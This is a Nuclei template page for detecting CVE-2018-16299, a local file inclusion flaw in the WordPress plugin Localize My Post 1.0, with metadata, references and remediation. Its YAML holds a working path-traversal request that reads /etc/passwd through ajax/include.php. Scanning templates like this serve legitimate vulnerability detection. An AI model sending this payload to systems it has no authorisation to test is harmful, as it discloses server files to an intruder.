Skip to content
Nuclei Templates

WordPress Localize My Post 1.0 - Local File Inclusion

ID: CVE-2018-16299

Severity: high

Author: 0x_Akoko,0x240x23elu

Tags: cve2018,cve,wordpress,lfi,plugin,wp,edb,packetstorm,localize_my_post_project

Description

Section titled “Description”

WordPress Localize My Post 1.0 is susceptible to local file inclusion via the ajax/include.php file parameter.

YAML Source

Section titled “YAML Source”
id: CVE-2018-16299


info:
  name: WordPress Localize My Post 1.0 - Local File Inclusion
  author: 0x_Akoko,0x240x23elu
  severity: high
  description: |
    WordPress Localize My Post 1.0 is susceptible to local file inclusion via the ajax/include.php file parameter.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the server.
  remediation: |
    Update to the latest version of WordPress Localize My Post plugin.
  reference:
    - https://www.exploit-db.com/exploits/45439
    - https://packetstormsecurity.com/files/149433/WordPress-Localize-My-Post-1.0-Local-File-Inclusion.html
    - https://github.com/julianburr/wp-plugin-localizemypost/issues/1
    - https://nvd.nist.gov/vuln/detail/CVE-2018-16299
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2018-16299
    cwe-id: CWE-22
    epss-score: 0.02738
    epss-percentile: 0.89516
    cpe: cpe:2.3:a:localize_my_post_project:localize_my_post:1.0:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: localize_my_post_project
    product: localize_my_post
    framework: wordpress
  tags: cve2018,cve,wordpress,lfi,plugin,wp,edb,packetstorm,localize_my_post_project


http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd"


    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"


      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d198e88748df0e28da1662b074c87194e77483e3fa52a8a22eec99ee06068ac302203ff3639c3994dd6ab8d4230606c4c32ab435517105d2fae4961ce1f7d653092e:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-16299.yaml"

View on Github